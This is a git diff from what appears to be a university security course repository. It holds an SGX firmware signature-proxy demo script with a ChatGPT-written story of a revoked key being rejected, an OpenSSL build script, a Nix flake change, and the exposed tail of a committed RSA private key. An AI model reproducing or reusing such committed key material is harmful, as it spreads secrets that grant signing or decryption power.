AhlKwhdPsO7PiF3e1AzHhGQwsUTt/Y/aSI1MpHBvy2/s1h9mFCslOUxTmWw0oj/Q
ldIEgWeNR72CE2+jFIJIyml6ftnb6qzPiga8Bm48ubKh0kvySOqnkmnPzgh+JBD6
JnBmtZbfPT97bwTT+N6rnPqOOApvfHPf15kWI8yDbprG1l4OCUaIUH1AszxLd826
5IPM+8gINLRDP1MA6azECPjTyHXhtnSIBZCyWSVkc05vYmNXYUNiXWMajcxW9M02
wKzFELO8NCEAkaTPxwo4SCyIjUxiK1LbQ9h8PSy4c1+gGP4LAMR8xqP4QKg6zdu9
osUGG/xRe/uufgTBFkcjqBHtK5L5VI0jeNIUAgW/6iNbYXjBMJ0GfauLs+g1VsOm
WfdgXzsb9DYdMa0OXXHypmV4GwKBwQDUwQj8RKJ6c8cT4vcWCoJvJF00+RFL+P3i
Gx2DLERxRrDa8AVGfqaCjsR+3vLgG8V/py+z+dxZYSqeB80Qeo6PDITcRKoeAYh9
xlT3LJOS+k1cJcEmlbbO2IjLkTmzSwa80fWexKu8/Xv6vv15gpqYl1ngYoqJM3pd
vzmTIOi7MKSZ0WmEQavrZj8zK4endE3v0eAEeQ55j1GImbypSf7Idh7wOXtjZ7WD
Dg6yWDrri+AP/L3gClMj8wsAxMV4ZR8CgcEA0fzDHkFa6raVOxWnObmRoDhAtE0a
cjUj976NM5yyfdf2MrKy4/RhdTiPZ6b08/lBC/+xRfV3xKVGzacm6QjqjZrUpgHC
0LKiZaMtccCJjLtPwQd0jGQEnKfMFaPsnhOc5y8qVkCzVOSthY5qhz0XNotHHFmJ
gffVgB0iqrMTvSL7IA2yqqpOqNRlhaYhNl8TiFP3gIeMtVa9rZy31JPgT2uJ+kfo
gV7sdTPEjPWZd7OshGxWpT6QfVDj/T9T7L6tAoHBAI3WBf2DFvxNL2KXT2QHAZ9t
k3imC4f7U+wSE6zILaDZyzygA4RUbwG0gv8/TJVn2P/Eynf76DuWHGlaiLWnCbSz
Az2DHBQBBaku409zDQym3j1ugMRjzzSQWzJg0SIyBH3hTmnYcn3+Uqcp/lEBvGW6
O+rsXFt3pukqJmIV8HzLGGaLm62BHUeZf3dyWm+i3p/hQAL7Xvu04QW70xuGqdr5
afV7p5eaeQIJXyGQJ0eylV/90+qxjMKiB1XYg6WYvwKBwQCL/ddpgOdHJGN8uRom
e7Zq0Csi3hGheMKlKbN3vcxT5U7MdyHtTZZOJbTvxKNNUNYH/8uD+PqDGNneb29G
BfGzvI3EASyLIcGZF3OhKwZd0jUrWk2y7Vhob91jwp2+t73vdMbkKyI4mHOuXvGv
fg95si9oO7EBT+Oqvhccd2J+F1IVXncccYnF4u5ZGWt5lLewN/pVr7MjjykeaHqN
t+rfnQam2psA6fL4zS2zTmZPzR2tnY8Y1GBTi0Ko1OKd1HMCgcAb5cB/7/AQlhP9
yQa04PLH9ygQkKKptZp7dy5WcWRx0K/hAHRoi2aw1wZqfm7VBNu2SLcs90kCCCxp
6C5sfJi6b8NpNbIPC+sc9wsFr7pGo9SFzQ78UlcWYK2Gu2FxlMjonhka5hvo4zvg
WxlpXKEkaFt3gLd92m/dMqBrHfafH7VwOJY2zT3WIpjwuk0ZzmRg5p0pG/svVQEH
NZmwRwlopysbR69B/n1nefJ84UO50fLh5s5Zr3gBRwbWNZyzhXk=
-----END RSA PRIVATE KEY-----

View file

@ -0,0 +1,16 @@
#!/bin/bash
# download latest release
wget -O /tmp/openssl-3.3.1.tar.gz https://github.com/openssl/openssl/releases/download/openssl-3.3.1/openssl-3.3.1.tar.gz
# unpack source
tar -xzvf /tmp/openssl-3.3.1.tar.gz -C /home/syssec/
cd /home/syssec/openssl-3.3.1
# build from source with static linking options
./config --prefix=/usr/local/openssl-3.3.1 --static -static -fPIC
make -j6
# install openssl
sudo make install

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@ -0,0 +1,74 @@
#!/usr/bin/env sh
set -u
# colors
RED='\033[0;31m'
GREEN='\033[0;32m'
NC='\033[0m'
# helper function
print_and_execute() {
local color=$1
shift
echo "⚡ ${color}$@${NC}"
eval "$@"
return $?
}
# setup
TMP=/tmp/signatureproxy
KEYDIR=../employee_keys
mkdir -p $TMP
########### Disclaimer #################
# Die Story wurde von ChatGPT erstellt #
########################################
# simulation
print_and_execute "$GREEN" "./signatureproxy proxysetup -pkey $TMP/proxy_private.bin > $TMP/proxy_public.pem"
echo "At Embedded Solutions Inc., security was paramount. The company specialized in creating firmware for a wide range of embedded devices used in critical industries, from medical equipment to automotive systems. To protect their firmware, they had implemented a sophisticated signature proxy system using Intel's SGX enclave technology."
echo "One bright morning, Alice, a senior engineer known for her meticulous work, arrived at her desk. She was tasked with signing the latest stable version of a critical medical device firmware that she had finished the previous night."
echo "With the proxy ready, Alice compiled their latest stable version. This firmware would soon run on life-saving medical devices, a fact that weighed heavily on her as she meticulously checked every detail."
print_and_execute "$GREEN" "dd if=/dev/urandom of=$TMP/firmware.bin bs=1M count=1 2> /dev/null"
echo "Once satisfied with the build, Alice signed the firmware with her private key as an assurance to the company that the firmware came from a trusted source."
print_and_execute "$GREEN" "./signatureproxy employee -ekey $KEYDIR/alice_private.pem -firm $TMP/firmware.bin > $TMP/signature_alice.der"
echo "The firmware, along with Alice's signature, was then sent to the signature proxy. The proxy, acting as a vigilant guardian, verified Alice's signature against a list of authorized keys. Her identity confirmed, the proxy resigned the firmware with its own private key."
print_and_execute "$GREEN" "cat $TMP/signature_alice.der | ./signatureproxy proxy -pkey $TMP/proxy_private.bin -epub $KEYDIR/alice_public.pem -firm $TMP/firmware.bin > $TMP/signature_for_alice.der"
echo "The final step was crucial: verifying the signed firmware to ensure it was ready for deployment. The team couldn't afford any mistakes, knowing the firmware's destination were life-saving medical devices."
print_and_execute "$GREEN" "cat $TMP/signature_for_alice.der | ./signatureproxy embedded -ppub $TMP/proxy_public.pem -firm $TMP/firmware.bin > /dev/null"
echo "\nMeanwhile, in a dark corner of the tech world, Oskar, a disgruntled former employee, was plotting his revenge. He had managed to get his hands on an old private key. With malicious intent, he set out to sign a modified version of the firmware, hoping to bypass the security measures."
echo "Oskar, driven by his vendetta, signed the firmware with his old private key, intending to trick the system and cause havoc."
print_and_execute "$RED" "./signatureproxy employee -ekey $KEYDIR/oskar_private.pem -firm $TMP/firmware.bin > $TMP/signature_oskar.der"
echo "With a smug grin, he tried to pass his signed firmware through the proxy. But the system was built to withstand such threats. The proxy, ever vigilant, scrutinized the incoming data."
print_and_execute "$RED" "cat $TMP/signature_oskar.der | ./signatureproxy proxy -pkey $TMP/proxy_private.bin -epub $KEYDIR/oskar_public.pem -firm $TMP/firmware.bin > $TMP/signature_for_oskar.der"
status=$?
if [ $status -eq 0 ]; then
echo "Oskar's firmware signing attempt seemed successful. :("
exit 1
else
echo "The proxy detected Oskar's unauthorized key and rejected the firmware. His malicious intent was thwarted, and the firmware remained secure."
fi
echo "With Oskar's attempt foiled, Embedded Solutions could breathe a sigh of relief. The integrity of their firmware was intact, safeguarded by the robust security measures of their signature proxy system. Alice and her team could continue their work with confidence, knowing that their systems were safe from internal and external threats."
echo "\nIn the meantime, Bob, another trusted engineer, was working on a firmware update for the automotive sector. This update was equally critical and needed the same level of security scrutiny."
print_and_execute "$GREEN" "dd if=/dev/urandom of=$TMP/firmware2.bin bs=1M count=1 2> /dev/null"
echo "Bob finished his work and, following the security protocols, signed the new firmware with his private key."
print_and_execute "$GREEN" "./signatureproxy employee -ekey $KEYDIR/bob_private.pem -firm $TMP/firmware2.bin > $TMP/signature_bob.der"
echo "The signed firmware was then sent to the signature proxy. As expected, the proxy verified Bob's signature and signed the firmware with its private key, ensuring the update's authenticity."
print_and_execute "$GREEN" "cat $TMP/signature_bob.der | ./signatureproxy proxy -pkey $TMP/proxy_private.bin -epub $KEYDIR/bob_public.pem -firm $TMP/firmware2.bin > $TMP/signature_for_bob.der"
echo "The final verification process confirmed that Bob's firmware update was secure and ready for deployment."
print_and_execute "$GREEN" "cat $TMP/signature_for_bob.der | ./signatureproxy embedded -ppub $TMP/proxy_public.pem -firm $TMP/firmware2.bin > /dev/null"
echo "This concludes the story of Alice, Oskar, Bob, and the secure firmware signing process at Embedded Solutions Inc. Through the diligent efforts of trusted employees and advanced security technology, the integrity and safety of their embedded devices were preserved."

View file

@ -7,6 +7,7 @@
assignments = [ assignments = [
"Assignment 4 - Protokollsicherheit (Praxis)" "Assignment 4 - Protokollsicherheit (Praxis)"
"Assignment 5 - Software Security - Teil 1" "Assignment 5 - Software Security - Teil 1"
"Assignment 6 - Software Security - Teil 2"
]; ];
forAllSystems = function: forAllSystems = function:
@ -15,7 +16,7 @@
"aarch64-linux" "aarch64-linux"
] (system: function { ] (system: function {
inherit system; inherit system;
pkgs = nixpkgs.legacyPackages.${system}; pkgs = import nixpkgs { inherit system; overlays = [ self.overlay ]; };
}); });
forAllAssignments = function: forAllAssignments = function:
@ -24,8 +25,12 @@
texPackages = pkgs: pkgs.texlive.combine { texPackages = pkgs: pkgs.texlive.combine {
inherit (pkgs.texlive) scheme-full latex-bin latexmk; inherit (pkgs.texlive) scheme-full latex-bin latexmk;
}; };
lastModifiedDate = self.lastModifiedDate or self.lastModified or "19700101";
version = builtins.substring 0 8 lastModifiedDate;
in rec { in rec {
packages = forAllSystems({system, pkgs}: forAllAssignments(assignment: let packages =
forAllSystems({system, pkgs}: forAllAssignments(assignment: let
tex = texPackages pkgs; tex = texPackages pkgs;
document = pkgs.stdenvNoCC.mkDerivation rec { document = pkgs.stdenvNoCC.mkDerivation rec {
name = assignment; name = assignment;
@ -47,6 +52,7 @@
}; };
in document) // { in document) // {
default = packages.${system}.${pkgs.lib.last assignments}; default = packages.${system}.${pkgs.lib.last assignments};
"Assignment 7" = pkgs.signatureProxy;
}); });
devShells = forAllSystems({pkgs, ...}: let devShells = forAllSystems({pkgs, ...}: let
@ -57,7 +63,40 @@
}; };
}); });
hydraJobs = packages; overlay = final: prev: with final; {
signatureProxy = stdenv.mkDerivation {
pname = "SignatureProxy";
inherit version;
src = ./7-SGX_Hands-on;
buildScript = ''
make
'';
installScript = ''
mkdir -p $out/bin
cp app $out/bin
cp enclave.so $out/bin
'';
nativeBuildInputs = with pkgs; [
clang
glibc
sgx-sdk
gmp.dev
openssl.dev
pkg-config
];
env = {
SGX_SDK = pkgs.sgx-sdk;
SGX_MODE = "SIM";
}; };
};
};
};
} }